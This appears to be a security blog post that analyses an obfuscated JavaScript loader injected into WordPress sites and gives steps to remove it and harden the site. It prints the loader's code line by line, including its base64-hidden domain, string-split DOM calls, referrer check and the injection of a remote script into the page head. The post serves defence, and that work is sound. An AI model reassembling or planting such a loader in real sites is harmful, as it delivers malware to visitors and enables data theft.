Beware of the Malicious Script in WordPress Websites

July 7, 2024


WordPress, being the most popular content management system (CMS), is a common target for cyberattacks. Recently, a malicious script loading from has been discovered on numerous WordPress websites. This article explains how the script works, the risks it poses, and steps to remove it and secure your site.

How the Malicious Script Works

The malicious script is designed to load a JavaScript file from the domain It dynamically constructs a URL based on the current timestamp, ensuring the loaded script is always up-to-date. Here’s a breakdown of the script:


  • Calculate the timestamp:

    • var _0x2196a7 = Math['floor'](Date['now']() / 0x3e8): This gets the current timestamp in seconds.
    • _0xcb1eb8 = _0x2196a7 - _0x2196a7 % 0xe10: This rounds down the timestamp to the nearest multiple of 3600 (0xe10 in hexadecimal).
  • Adjust the timestamp:

    • _0x2196a7 -= _0x2196a7 % 0x258: This further adjusts the timestamp to the nearest multiple of 600 (0x258 in hexadecimal).
    • _0x2196a7 = _0x2196a7['toString'](0x10): Converts the adjusted timestamp to a hexadecimal string.
  • Check the document referrer:

    • if (!document['referrer']) return;: If there is no referrer, the script terminates.
  • Decode the URL:

    • let _0x9cf45e = atob('Y3Jhe' + 'nkyY2Ru' + 'LmNvbQ==');: This decodes the base64 encoded string 'Y3JhenkyY2RuLmNvbQ==' to ''.
  • Create and append the script:

    • (_0x24b800 = _0x26d259['createElem' + 'ent']('script')): Creates a new script element.
    • ['type'] = 'text/javas' + 'cript': Sets the type attribute to ‘text/javascript’.
    • ['async'] = !0x0: Sets the async attribute to true.
    • ['src'] = 'https://' + _0x9cf45e + '/min.t.' + _0xcb1eb8 + '.js?v=' + _0x2196a7: Sets the src attribute to a URL constructed with the decoded domain, timestamp, and version.
    • _0x26d259['getElement' + 'sByTagName']('head')[0x0]['appendChil' + 'd'](_0x24b800);: Appends the script element to the head of the document.

Key Components:

  1. Timestamp Calculation: The script calculates a timestamp and rounds it to the nearest hour and ten minutes.
  2. URL Construction: It constructs a URL using the decoded domain and the calculated timestamp.
  3. Script Loading: The script element is created and appended to the document’s head, loading the external JavaScript file.

Potential Risks:

  • Malware Injection: The external script can inject malware or other malicious code into your website.
  • Data Theft: It can steal sensitive information from your site and its visitors.
  • SEO Poisoning: Malicious scripts can manipulate your site’s SEO to redirect traffic to harmful sites.

How to Detect and Remove the Malicious Script

Step 1: Locate the Script

  1. Theme Files: Check your theme files, especially header.php and footer.php.
  2. Custom Scripts: Look for custom scripts added to your site.

Step 2: Remove the Script

Simply delete the malicious script from your files.

Step 3: Scan for Other Malicious Code

  1. Security Plugins: Use security plugins like Wordfence, Sucuri, or iThemes Security to scan your site.
  2. Manual Review: Manually review other theme and plugin files for suspicious code.

Enhance Your Site’s Security

Change Passwords

  • Update passwords for your WordPress admin, database, hosting account, and other associated services.

Update WordPress

  • Ensure your WordPress core, themes, and plugins are up-to-date.

Use Security Plugins

  • Install security plugins to add layers of protection, such as firewall rules and malware scanning.

Harden WordPress

  • Follow WordPress hardening guidelines to secure your site.

Monitor for Changes

  • Set up monitoring to alert you of unauthorized changes.


The crazzycdn .com script is a significant security threat to WordPress websites. By following the steps outlined in this article, you can remove the malicious script and enhance your site’s security to prevent future attacks. Always stay vigilant and keep your site updated and secure.

Leave a Comment